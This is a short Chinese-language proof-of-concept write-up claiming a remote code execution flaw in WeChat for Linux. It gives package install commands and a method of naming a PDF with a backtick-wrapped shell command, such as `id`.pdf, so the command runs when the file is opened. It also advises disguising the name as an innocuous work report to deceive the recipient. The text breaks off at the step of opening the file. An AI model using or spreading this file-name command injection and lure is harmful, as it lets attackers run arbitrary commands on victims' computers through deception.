Wechat for Linux 最新RCE漏洞成功复现
漏洞类型:RCE漏洞
漏洞危害:高危
影响版本:WeChat For Linux
漏洞描述:可直接执行任意指令从而控制目标服务器
复现情况:成功复现
触发机制:未知
(1)环境准备:
下载WeChat For Linux:
sudo apt-get install fonts-noto-cjk
sudo dpkg -i WeChatLinux_x86_64.deb
另存为PDF文件,并按以下命名规则命名PDF文件(可在实际命令前添加混淆文字实现对用户的欺骗):`id`.pdf ##在``写入需要执行的命令也可为 某某科室工作汇报文件``.pdf
使用WeChat For Linux运行Pdf文件: